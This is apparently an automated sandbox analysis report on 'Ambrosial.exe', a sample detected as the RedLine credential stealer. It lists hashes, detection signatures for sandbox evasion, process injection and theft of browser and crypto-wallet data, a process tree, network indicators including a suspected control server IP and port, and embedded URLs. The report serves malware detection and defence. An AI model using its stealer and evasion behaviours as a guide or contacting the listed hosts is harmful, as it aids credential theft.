Loading ...

Play interactive tourEdit tour

Windows Analysis Report Ambrosial.exe

Overview

General Information

Sample Name:Ambrosial.exe
Analysis ID:512228
MD5:3480891869269773f85cf1cb389bbf96
SHA1:6c08b67e2fb0f63788ad2fd7f74ba160eb507175
SHA256:1fd73d2549cb9a36d4a27fd7ed6f9ba7aa0ff0e1103b4b96821de901152b118e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Yara detected Costura Assembly Loader
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect virtualization through RDTSC time measurements
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Writes to foreign memory regions
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
.NET source code contains process injector
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • Ambrosial.exe (PID: 5564 cmdline: 'C:\Users\user\Desktop\Ambrosial.exe' MD5: 3480891869269773F85CF1CB389BBF96)
    • turbosquad_support417981.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe' MD5: CB46AAC29D0C07833C3CD7395D373FCF)
      • AppLaunch.exe (PID: 6180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • WerFault.exe (PID: 3752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 516 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • Ambrosial.exe (PID: 5472 cmdline: 'C:\Users\user\AppData\Local\Temp\Ambrosial.exe' MD5: E3635A875AA0817F0E29544AD9FF84B5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Ambrosial.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: Ambrosial.exe PID: 5564JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: Ambrosial.exe PID: 5472JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Process Memory Space: AppLaunch.exe PID: 6180JoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 1 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: Ambrosial.exeVirustotal: Detection: 38%Perma Link
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: Ambrosial.exeAvira: detected
              Machine Learning detection for sampleShow sources
              Source: Ambrosial.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeJoe Sandbox ML: detected
              Source: Ambrosial.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49748 version: TLS 1.2
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbg source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: fltLib.pdb/ source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp
              Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdby source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|52414EC411DEA325110F0AD21378C8D101897989|2544 source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: costura.costura.pdb.compressed source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: E:\buildslave\win\64x\ambrosial-64xR\Ambrosial\Ambrosial\obj\x64\Release\Ambrosial.pdb source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: shell32.pdbK source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: combase.pdba source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdbW source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: D:\Projects\Guna.UI2\Build\Guna.UI2.WinForms\build\nuget\release\Guna.UI2.pdb source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior

              Networking:

              barindex
              Connects to many ports of the same IP (likely port scanning)Show sources
              Source: global trafficTCP traffic: 178.33.87.34 ports 45760,0,4,5,6,7
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /disepi/ambrosial/main/cachedclients.json HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /disepi/ambrosial/main/cachedclients.json HTTP/1.1Host: raw.githubusercontent.com
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/863628606516625408/866495749909643294/ZephyrBannerIcon-nxstBX5z.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835331120836378624/atani2.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835691740962226216/ataraxiaback.png HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/489891892142669842/835895405849739344/auroraback.png HTTP/1.1Host: cdn.discordapp.com
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
              Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
              Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
              Source: global trafficTCP traffic: 192.168.2.3:49745 -> 178.33.87.34:45760
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
              Source: WerFault.exe, 00000007.00000002.363004473.0000000004620000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: Ambrosial.exe, 00000003.00000003.542531599.0000020255DF7000.00000004.00000001.sdmp, Ambrosial.exe, 00000003.00000003.537582045.0000020255DF8000.00000004.00000001.sdmpString found in binary or memory: http://en.w
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: AppLaunch.exe, 00000004.00000002.414510553.000000000526D000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: Ambrosial.exe, 00000000.00000002.315663583.0000000000448000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp, turbosquad_support417981.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault$
              Source: AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
              Source: AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
